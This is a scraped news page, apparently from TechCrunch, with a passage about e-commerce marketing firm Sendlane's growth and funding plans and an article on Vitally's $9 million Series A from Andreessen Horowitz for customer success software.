When two other companies Kim was involved in exited in 2017, he decided to put both feet into Sendlane to build it into a system that maximized revenue based on insights and integrations.

In late 2018, the company attracted seed funding from Zing Capital and decided in 2019 to pivot into e-commerce. “Based on our personal backgrounds and looking at the customers we worked with, we realized that is what we did best,” Kim said.

Today, more than 1,700 e-commerce companies use Sendlane’s platform to convert more than 100 points of their customers’ data — abandoned carts, which products sell the best and which marketing channel is working — into engaging communications aimed at driving customer loyalty. The company said it can increase revenue for customers between 20% and 40% on average.

The company itself is growing 100% year over year and seeing over $7 million in annual recurring revenue. It currently has 54 employees right now, and Kim expects to be at around 90 by the end of the year and 150 by the end of 2022. Sendlane currently has more than 20 open roles, he said.

That current and potential growth was a driver for Kim to go after the Series A funding. He said Sendlane became profitable last year, which is why it has not raised a lot of money so far. However, as the rapid adoption of e-commerce continues, Kim wants to be ready for the next wave of competition coming in, which he expects in the next year.

He considers companies like ActiveCampaign and Klaviyo to be in line with Sendlane, but says his company’s differentiator is customer service, boasting short wait times and chats that answer questions in less than 15 seconds.

He is also ready to go after the next vision, which is to unify data and insights to create meaningful interactions between customers and retailers.

“We want to start carving out a new space,” Kim added. “We have a ton of new products coming out in the next 12 to 18 months and want to be the single source for customer journey data insights that provides flexibility for your business to grow.”

Two upcoming tools include Audiences, which will unify customer data and provide insights, and an SMS product for two-way communications and enabled campaign-level sending.

How Klaviyo transformed from a lifestyle business into a $4.15B email titan

 

Andreessen Horowitz funds Vitally’s $9M round for customer experience software

/0 Comments/in /by

Customer success company Vitally raised $9 million in Series A funding from Andreessen Horowitz to continue developing its SaaS platform automating customer experiences.

Co-founder and CEO Jamie Davidson got the idea for Vitally while he was at his previous company, Pathgather. As chief customer officer, he was looking at tools and “was underwhelmed” by the available tools to automate repetitive tasks. So he set out to build one.

The global pandemic thrust customer satisfaction into the limelight as brands realized that the same ways they were engaging with customers had to change now that everyone was making the majority of their purchases online. Previously, a customer service representative may have managed a dozen accounts, but nowadays with product-led growth, they tackle a portfolio of thousands of customers, Davidson told TechCrunch.

New York-based Vitally, founded in 2017, unifies all of that customer data into one place and flows it through an engine to provide engagement insights, like what help customers need, which ones are at risk of churning and which to target for expanded revenue opportunities. Its software also provides automation to balance workflow and steer customer success teams to the tasks with the right customers so that they are engaging at the correct time.

Andreessen approached Davidson for the Series A, and he liked the alignment in customer success vision, he said. Including the new funding, Vitally raised a total of $10.6 million, which includes $1.2 million in September 2019.

From the beginning, Vitally was bringing in strong revenue growth, which enabled the company to focus on building its platform and hold off on fundraising.

“A Series A was certainly on our mind and road map, but we weren’t actively fundraising,” Davidson said. “However, we saw a great fit and great backing to help us grow. Tools have lagged in the customer success area and how to manage that. Andreessen can help us scale and grow with our customers as they manage the thousands of their customers.”

Davidson intends to use the new funding to scale Vitally’s team across the board and build out its marketing efforts to introduce the company to the market. He expects to grow to 30 by the end of the year to support the company’s annual revenue growth — averaging 3x — and customer acquisition. Vitally is already working with big customers like Segment, Productboard and Calendly.

As part of the investment, Andreessen general partner David Ulevitch is joining the Vitally board. He saw an opportunity for the reimagining of how SaaS companies delivered customer success, he told TechCrunch via email.

Similar to Davidson, he thought that customer success teams were now instrumental to growing SaaS businesses, but technology lagged behind market need, especially with so many SaaS companies taking a self-serve or product-led approach that attracted more orders than legacy tools.

Before the firm met Vitally, it was hearing “rave reviews” from its customers, Ulevitch said.

“The feedback was overwhelmingly positive and affirmed the fact that Vitally simply had the best product on the market since it actually mapped to how businesses operated and interacted with customers, particularly businesses with a long-tail of paying customers,” he added. “The first dollar into a SaaS company is great, but it’s the renewal and expansion dollars that really set the winners apart from everyone else. Vitally is in the best position to help companies get that renewal, help their customers expand accounts and ultimately win the space.”

SaaS needs to take a page out of the crypto playbook